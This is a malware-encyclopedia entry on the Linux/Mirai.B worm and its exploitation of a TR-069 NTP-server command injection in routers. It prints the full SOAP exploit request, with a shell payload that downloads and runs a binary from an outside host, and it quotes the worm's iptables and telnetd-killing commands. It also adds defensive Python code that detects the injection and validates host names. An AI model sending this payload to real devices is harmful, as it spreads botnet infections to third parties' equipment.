Threat Encyclopedia

Linux/Mirai.B!worm

Analysis

Linux/Mirai.B!worm is a bot that runs on Linux systems on which BusyBox is available, and it particularly targets IoT devices. Its well-known relative, Linux/Mirai.A!worm, caused DDoS attacks against several companies and websites. So far, Linux/Mirai.B!worm is reported to have affected a German operator.

The malware exploits a known vulnerability in the implementation of the TR-069 remote-management interface on some routers and modems; the flaw is in the vendors' implementation, not in the protocol specification itself. TR-069 is used by operators to manage routers and modems remotely. With TR-069, you can:

  • Get information on the router or modem
  • Run DSL diagnostics
  • Adjust time
  • ...
Concerning time adjustment, it is possible to specify an NTP server to use and synchronize the time automatically. Unfortunately, on some routers and modems the implementation passes the supplied server name to a shell without sanitizing it, which allows arbitrary command execution.
Linux/Mirai.B!worm exploits this vulnerability by crafting a SetNTPServers request, but instead of providing the name of a valid NTP server, it provides a shell command, enclosed in backticks, that downloads and runs a malicious payload from a remote server. For example:
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1>
<NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>
<NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>
</u:SetNTPServers>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
In this case, the malicious sample sets the new NTP server to
`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`
When the device evaluates this value in a shell, it changes to the /tmp directory, downloads the malicious payload named 2 from the host l.ocalhost.host (note that this is not localhost; the name no longer resolves), marks the file as executable with chmod 777 and runs it.
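The following is an added example written for this entry; it is not code from the original analysis or from the malware. It shows why the request above works and how to catch it: the NTP server field is parsed out of the SetNTPServers SOAP body, any value containing shell metacharacters is flagged as command injection and the download URL is extracted as an indicator, and a hardened validator beside it accepts only a syntactically valid host name or IPv4 address. The two requests are constructed samples built from the request shown above; the function names and the unsafe command-building pattern are illustrative assumptions, not the firmware's actual code.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: the SetNTPServers request from the analysis above, with the
# injected command in NewNTPServer1.
MALICIOUS_REQUEST = """<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1>
<NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>
<NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>
</u:SetNTPServers>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"""

# Constructed benign sample: the same request carrying a legitimate NTP host name.
BENIGN_REQUEST = MALICIOUS_REQUEST.replace(
    "`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`", "pool.ntp.org")

TIME_NS = "urn:dslforum-org:service:Time:1"

# Characters that never appear in a host name but let a shell run extra commands.
SHELL_META = re.compile(r"[`$;|&<>(){}\n]")
# RFC 1123 host name (dotted IPv4 addresses match as well): dot-separated labels of
# letters, digits and hyphens, 63 characters per label, 253 characters in total.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)([A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")
URL_IN_CMD = re.compile(r"https?://[^\s;`'\"|&<>]+")


def ntp_server_values(soap_xml):
    """Return (field name, value) pairs for the NewNTPServerN fields, in document order."""
    root = ET.fromstring(soap_xml)
    action = root.find(".//{%s}SetNTPServers" % TIME_NS)
    if action is None:
        return []
    # The NewNTPServerN children carry no namespace prefix, so their tags are bare.
    return [(child.tag, child.text or "") for child in action]


def build_sync_command_unsafe(server):
    """Hypothetical vulnerable pattern: the field is spliced straight into a shell line.
    Backticks in `server` would be evaluated by the shell. Shown only, never executed."""
    return "ntpclient -h " + server


def is_valid_ntp_server(value):
    """Hardened check: accept only an empty field or a well-formed host name / IPv4."""
    return value == "" or bool(HOSTNAME.match(value))


def inspect_request(soap_xml):
    """Detection: report every NTP server field that is not a plain host name,
    distinguishing shell-injection attempts from merely malformed values and
    extracting any download URLs from the injected command as indicators."""
    findings = []
    for tag, value in ntp_server_values(soap_xml):
        if is_valid_ntp_server(value):
            continue
        findings.append({
            "field": tag,
            "value": value,
            "reason": "shell metacharacters" if SHELL_META.search(value) else "not a host name",
            "urls": URL_IN_CMD.findall(value),
        })
    return findings


if __name__ == "__main__":
    for f in inspect_request(MALICIOUS_REQUEST):
        print("%s (%s): %r -> download %s" % (f["field"], f["reason"], f["value"], f["urls"]))
    print("benign findings:", inspect_request(BENIGN_REQUEST))
    print("unsafe shell line would be:", build_sync_command_unsafe("`id`"))
```

The same validation logic belongs on the device side: if the firmware had rejected anything that is not a host name before handing the value to a shell (or had avoided the shell entirely by calling the NTP client with an argument vector), the backtick payload would never have executed. On the network side, the detection function can be run over captured POST bodies to TCP port 7547 to flag exploitation attempts and harvest the payload URL.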
An infected device does the following:
  • Scans other devices for an open TCP port 7547 (the port used by TR-069). If the port is open, it attempts to infect the device by POSTing the SOAP request shown above.
  • Blocks port 7547 to prevent re-infection. This is done with a simple iptables command:
    busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP
    
  • Kills the telnet daemon as well, so that the device can no longer be reached over telnet:
    busybox killall -9 telnetd
    

Recommended Action

To cure the device:

  1. Reboot the device. The malware does not persist across a reboot. Note that the reboot also removes the iptables rule the malware added, so a rebooted device is vulnerable again and can be re-infected quickly if port 7547 is reachable from the Internet; do not stop at this step.
  2. Update the device's firmware (if an update is available) so that it is no longer vulnerable. If no fixed firmware exists, block inbound access to TCP port 7547 from the WAN.